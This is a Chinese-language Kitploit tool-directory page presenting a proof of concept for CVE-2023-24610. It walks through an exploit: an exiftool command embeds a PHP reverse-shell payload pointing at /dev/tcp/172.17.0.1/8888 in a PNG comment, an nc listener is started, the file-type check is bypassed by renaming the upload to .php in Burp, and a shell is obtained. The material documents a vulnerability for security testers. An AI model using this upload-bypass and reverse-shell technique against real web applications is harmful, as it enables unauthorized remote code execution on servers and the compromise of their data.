Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-24610 — 这是一个针对CVE-2023-24610的概念验证。 | Kitploit
工具/GitHubGitHub/abbisqq/cve-2023-24610
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubabbisqq/cve-2023-24610

CVE-2023-24610

这是一个针对CVE-2023-24610的概念验证。

查看仓库
323年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-24610

这是针对 CVE-2023-24610 的概念验证

首先,我们使用 exiftool 创建一个多语言文件: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

nosh1

我们将文件改为 png 格式,以通过前端检查

nosh2

之后,我们在 8888 端口启动一个 nc 监听器来接收 shell。

nosh3

下一步是登录应用程序并点击设置

nosh4

在页面底部,我们看到一个练习标志区域。我们可以通过右侧的编辑按钮上传文件

nosh5

点击编辑,然后点击浏览,选择我们在第一步创建的“.png”文件

nosh6

在上传之前,确保我们用 burp 或类似工具拦截了请求。 我们点击上传,并在 burp 中将文件扩展名从“png”改为“php”

nosh7

我们关闭拦截,以便文件上传成功,并检查之前启动的 nc 监听器。 我们获得了反向 shell,IP 指向我们的 docker 容器。

nosh8

下载工具